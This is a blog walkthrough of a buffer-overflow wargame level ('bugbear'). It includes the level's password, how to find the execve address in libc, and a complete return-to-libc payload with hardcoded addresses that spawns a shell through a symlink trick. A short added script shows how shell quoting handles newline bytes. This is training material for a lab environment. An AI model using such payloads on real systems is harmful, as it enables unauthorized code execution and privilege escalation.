CafeM0ca


[LOB]level13 bugbear

M0ca 2018. 1. 17. 22:59

ID: bugbear

PW: new divide


The code in the picture gets the libc offset and the execve offset.

libc offset + execve offset = execve addr!

popen() reads the output of a process.


One thing you should know: the execve address is fixed for any binary file, so getting the execve address is easy.

In gdb, print execve (or p execve) shows it.


Copy the original giant.c to ./tmp (mkdir tmp; the tmp directory is accessible to any user) and add code to giant.c as in the picture.

You can check execve_addr: it is the same address that 'p execve' gives.


If you use a payload like ./filename `python -c 'print "A"*44+"\x48\x9d\x0a\x40"+"ret"+"parameter1"+"parameter2"'` ...

strcpy sees the '\x0a' as \n, and the exploit fails.

Use the payload in this form instead: "$(python -c 'print "..." ')". OK?
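An added example, not code from the original post, showing what the shell does to an argument that contains a 0x0a byte before the target program ever copies it. The result of an unquoted command substitution (backticks or $(...)) is split on the characters in IFS, which include the newline, so a byte string with 0x0a in the middle arrives as two arguments; quoting the substitution as "$(...)" turns field splitting off and the bytes arrive as one argument. The AAAA/BBBB strings are constructed stand-ins, not the post's addresses.

```shell
#!/bin/sh
# Added example (not code from the original post): how the shell treats an
# argument that contains a 0x0a (newline) byte. The sample bytes are
# constructed; they stand in for an address such as the one in the post.

# Report how many arguments the callee actually received.
count_args() {
    echo "$#"
}

# Report the byte length of the first argument the callee received.
first_arg_len() {
    printf '%s' "$1" | wc -c | tr -d ' '
}

# Unquoted backtick substitution: the result is split on IFS characters
# (space, tab, newline), so "AAAA\nBBBB" arrives as two arguments.
unquoted_backtick_count() {
    count_args `printf 'AAAA\nBBBB'`
}

# Unquoted $(...) behaves the same way; the syntax is not what matters,
# the missing quotes are.
unquoted_dollar_count() {
    count_args $(printf 'AAAA\nBBBB')
}

# In the unquoted form the first argument is only the bytes before 0x0a.
unquoted_first_len() {
    first_arg_len `printf 'AAAA\nBBBB'`
}

# Quoted "$(...)": no field splitting, so all 9 bytes arrive as one
# argument with the 0x0a byte intact (only trailing newlines are removed).
quoted_count() {
    count_args "$(printf 'AAAA\nBBBB')"
}

quoted_first_len() {
    first_arg_len "$(printf 'AAAA\nBBBB')"
}

# Stand-alone run: prints "2 4 1 9"
echo "$(unquoted_backtick_count) $(unquoted_first_len) $(quoted_count) $(quoted_first_len)"
```

The same splitting applies to any byte in IFS (space 0x20 and tab 0x09 as well as 0x0a), so an argument built from raw bytes should always be passed through a quoted substitution.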


The payload is "A"*44 + "execve addr" + "ret (exit() or any 4 bytes)" + "/bin/sh path" + "/bin/sh" + "NULL".

Key point: execve's second parameter is a pointer to {"/bin/sh", 0}; use a symbolic link "/bin/sh" (argv[0] -> filename). The third parameter is NULL; use the end of the stack.


Symbolic link:

ln -s copyfile /bin/sh

Find the filename (execve parameter 2) and the NULL (execve parameter 3).



payload: ./`python -c 'print "\xf9\xbf\x0f\x40"'` "$(python -c 'print "A"*44+"\x48\x9d\x0a\x40"+"\xf8\x91\x03\x40"+"\xf9\xbf\x0f\x40"+"\xf7\xff\xff\xbf"+"\xfc\xff\xff\xbf"')"

exploit






